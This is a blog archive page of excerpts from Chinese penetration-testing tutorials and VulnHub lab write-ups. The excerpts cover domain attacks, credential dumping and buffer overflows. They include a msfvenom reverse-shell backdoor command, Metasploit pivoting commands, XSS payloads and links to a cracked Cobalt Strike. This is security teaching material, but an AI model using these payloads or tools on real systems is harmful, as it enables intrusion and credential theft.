08 2019 档案

摘要:简介: 微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。 微软官方文档:https://docs.microsoft.com/en-us/prev 阅读全文
posted @ 2019-08-31 23:20 micr067 阅读(1006) 评论(0) 推荐(0)
摘要:实验环境: kali 主机:192.168.88.193 目标靶机:win2008 R2 192.168.88.130 kali 主机上执行生成一个后门 exe: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPO 阅读全文
posted @ 2019-08-31 23:18 micr067 阅读(374) 评论(0) 推荐(0)
摘要:Cobalt_Strike3.14下载: https://download.csdn.net/download/weixin_41082546/11604021 https://github.com/harleyQu1nn/AggressorScriptshttps://github.com/blu 阅读全文
posted @ 2019-08-30 11:25 micr067 阅读(4898) 评论(0) 推荐(0)
摘要:MSF 下域内渗透实战 先获取域内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255. 阅读全文
posted @ 2019-08-30 08:17 micr067 阅读(136) 评论(0) 推荐(0)
摘要:Kerberos认证工作原理 https://www.cnblogs.com/huamingao/p/7267423.html 5.获取访问活动目录数据库文件的权限(ntds.dit) 前提条件是获取域控权限: 1.通过备份路径(备份服务器储存,媒体,网络共享) 2 在准备配置成域控的服务器上找 N 阅读全文
posted @ 2019-08-30 08:14 micr067 阅读(439) 评论(0) 推荐(0)
摘要:pass the ticket 在域环境中,Kerberos协议被用来作身份认证,这里仅介绍几个名词: KDC(Key Distribution Center): 密钥分发中心,里面包含两个服务:AS和TGS AS(Authentication Server): 身份认证服务 TGS(Ticket 阅读全文
posted @ 2019-08-29 00:12 micr067 阅读(243) 评论(0) 推荐(0)
摘要:1、抓取域 hash 密码vsssown.vbs、vshadow.exe、ntdsdump.exe、 mimikatz 等2、hash 注入wce 直接获取到域登录的 hash 值:wce.exe >hash... 阅读全文
posted @ 2019-08-28 00:06 micr067 阅读(554) 评论(0) 推荐(0)
摘要:一、域渗透基础1.域控:win server 20082.域内DC:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp1.域渗透基本命... 阅读全文
posted @ 2019-08-28 00:01 micr067 阅读(177) 评论(0) 推荐(0)
摘要:项目地址:https://github.com/fatedier/frp/releases 下载对应版本程序 wget https://github.com/fatedier/frp/releases/download/v0.27.0/frp_0.27.0_linux_amd64.tar.gz 解压 阅读全文
posted @ 2019-08-26 12:46 micr067 阅读(216) 评论(0) 推荐(0)
摘要:0x00 简介 1.域控:win server 2008 2.域内服务器:win server 2008、win server 2003 3.域内PC:win7 x64、win7 x32、win xp 0x01.配置静态IP 查看IP地址和网关 DNS为127.0.0.1,域控安装过程中会默认安装D 阅读全文
posted @ 2019-08-25 22:11 micr067 阅读(585) 评论(0) 推荐(0)
摘要:靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip XXE注入工具下载: https://download.csdn.net/download/weixin_41082546/11609927 CTFCrackTools解码工具: https://do 阅读全文
posted @ 2019-08-24 23:20 micr067 阅读(1691) 评论(1) 推荐(0)
摘要:COBAIT STRIKE 3.14破解版: https://download.csdn.net/download/weixin_41082546/11604021 客户端攻击重定向设置 view —application 查看目标系统日志 attack—web-drive-by—site clon 阅读全文
posted @ 2019-08-24 17:48 micr067 阅读(392) 评论(0) 推荐(0)
摘要:0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/rave 阅读全文
posted @ 2019-08-24 17:04 micr067 阅读(832) 评论(0) 推荐(0)
摘要:靶场下载链接:Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com... 阅读全文
posted @ 2019-08-23 16:19 micr067 阅读(396) 评论(0) 推荐(0)
摘要:勒索病毒应急处置流程 1.事件状态判断 了解现状,了解发病时间,了解系统架构 确认被感染主机范围 2.临时处置 已感染主机:进行网络隔离,禁止使用U盘、移动银盘等移动存储设备 未感染主机:ACL隔离、关闭ssh、rdp等协议,禁止使用U盘、移动硬盘。 3.信息收集分析 样本获取 windows: 文 阅读全文
posted @ 2019-08-22 21:16 micr067 阅读(1960) 评论(0) 推荐(0)
摘要:原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。 工具: 调试工具:edb; ###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势 实验对象:crossfire【多人在线RPG游戏】 运行平台:Kali i386 虚拟机【32位,计算机C 阅读全文
posted @ 2019-08-22 21:11 micr067 阅读(765) 评论(0) 推荐(0)
摘要:一、基本概念 缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。 在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server 阅读全文
posted @ 2019-08-22 21:09 micr067 阅读(4412) 评论(0) 推荐(0)
摘要:简介 Conky 是一个应用于桌面环境的系统监视软件,可以在桌面上监控系统运行状态、网络状态等一系列参数 https://github.com/brndnmtthws/conky/ 详细配置文档:http://conky.sourceforge.net/docs.html 简洁的用户界面; 高度可配 阅读全文
posted @ 2019-08-22 18:52 micr067 阅读(3350) 评论(0) 推荐(0)
摘要:知识点: 倘若是在script、input标签当中,即可突破。 Payload ' oninput=alert`1` // 当要在input中输入内容时触发事件 ' oninput=alert`1` ' 同上 ' onchange=alert`1` // 发生改变的时候触发该事件 ' onchang 阅读全文
posted @ 2019-08-22 18:48 micr067 阅读(1926) 评论(0) 推荐(0)
摘要:在渗透测试过程中,很多时候我们需要反弹一个shell回来。使用empire也好,MSF也好,其他工具也好,都避不开公网IP的问题。这时候我们就需要一个VPS来进一步进行渗透测试。 建立通道连接的方式有很多种,比如NAT映射、ssh隧道等各种方式,这里我们就不探讨了。 建立通道的不稳定性很高,容易断开 阅读全文
posted @ 2019-08-22 18:40 micr067 阅读(2684) 评论(0) 推荐(0)
摘要:电子取证的基本概念 科学的运用提取和证明方法,对于从电子数据源提取的证据保护(preservation)、收集(collection)、验证(validation)、鉴定(identification)、分析(analysis)、解释(interpetation)、存档(documentation) 阅读全文
posted @ 2019-08-22 18:36 micr067 阅读(625) 评论(0) 推荐(0)
摘要:启动一个文本文件 tasklist 查看进程列表 可以看到notepad.exe正在后台运行 procdump -ma notepad.exe notepad.dmp -m memory -a all 意思就是将和notepad.exe程序有关的所有内存dump下来保存为.dmp文件 当前目录下生成 阅读全文
posted @ 2019-08-22 18:35 micr067 阅读(699) 评论(0) 推荐(0)
摘要:电子取证 使用dumpit工具将计算机内存镜像保存。并生成raw文件格式文件。 检测镜像文件基本信息 volatility -f 2008.raw imageinfo 检测进程列表及物理内存位置 volatility -f 2008.raw --profile=Win2008R2SP1x64 psl 阅读全文
posted @ 2019-08-22 18:34 micr067 阅读(1358) 评论(0) 推荐(0)
摘要:SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 参考:https://www.cnblogs.com/yuzly/p/10854392.html 提权辅助工具LinEnum下载:https://download.csdn.net/dow 阅读全文
posted @ 2019-08-22 18:31 micr067 阅读(344) 评论(0) 推荐(0)
摘要:droopyCTF https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm CTF镜像合集:https://www.vulnhub.com/?page=18 参考:https://www.hackingarticles.in/hack-droo 阅读全文
posted @ 2019-08-22 18:29 micr067 阅读(453) 评论(0) 推荐(0)
摘要:BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 参考:https://www.jianshu.com/p/9813095ce04d 提权辅助工具LinEnum下载:https://download.csdn.net/download/ 阅读全文
posted @ 2019-08-22 18:28 micr067 阅读(744) 评论(0) 推荐(0)
摘要:原文地址:https://www.payload.com.cn/ basic-pentesting-1 下载地址: https://www.vulnhub.com/entry/basic-pentesting-1,216/ 提权辅助工具LinEnum下载:https://download.csdn. 阅读全文
posted @ 2019-08-22 18:26 micr067 阅读(785) 评论(0) 推荐(0)
摘要:靶场下载链接: Download: http://www.five86.com/downloads/DC-2.zip Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip Download (Torrent): https://dow 阅读全文
posted @ 2019-08-22 18:22 micr067 阅读(1870) 评论(0) 推荐(0)
摘要:靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://dow 阅读全文
posted @ 2019-08-22 18:19 micr067 阅读(2201) 评论(0) 推荐(0)
该文被密码保护。
posted @ 2019-08-21 05:33 micr067 阅读(141) 评论(0) 推荐(0)
该文被密码保护。
posted @ 2019-08-21 05:22 micr067 阅读(145) 评论(0) 推荐(0)
摘要:basic-pentesting-1https://www.vulnhub.com/entry/basic-pentesting-1,216/获取ip地址端口扫描,服务识别根据服务版本搜索相关漏洞通过查看漏洞利... 阅读全文
posted @ 2019-08-11 14:47 micr067 阅读(400) 评论(0) 推荐(0)
摘要:SickOs:1.2https://www.vulnhub.com/entry/sickos-12,144/首先获取目标ip地址,并探测端口netdiscover -i eth0 -r 192.168.88.1... 阅读全文
posted @ 2019-08-11 14:45 micr067 阅读(228) 评论(0) 推荐(0)
摘要:BTRSys 2.1https://www.vulnhub.com/entry/btrsys-v21,196/1.确定目标ip2.端口和服务探测根据vsftp版本没有找到相关漏洞利用代码然后我们转战web查看页... 阅读全文
posted @ 2019-08-11 14:43 micr067 阅读(232) 评论(0) 推荐(0)
摘要:droopyCTFhttps://www.vulnhub.com/?q=droopy&sort=date-des&type=vmCTF镜像合集:https://www.vulnhub.com/?page=18参... 阅读全文
posted @ 2019-08-11 14:41 micr067 阅读(138) 评论(0) 推荐(0)
摘要:开启windows 功能选中 适用于linux 的windows 子系统打开Microsoft store,安装kali 系统系统安装完成之后,通过apt-get install kali-linux-full ... 阅读全文
posted @ 2019-08-11 14:33 micr067 阅读(185) 评论(0) 推荐(0)
摘要:1. mitmf注入xss即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码如果中间人发生在运营商线路上,很难引起用户注意曾经号称最好用的中间人攻击工具安装依赖apt-get install p... 阅读全文
posted @ 2019-08-11 14:31 micr067 阅读(245) 评论(0) 推荐(0)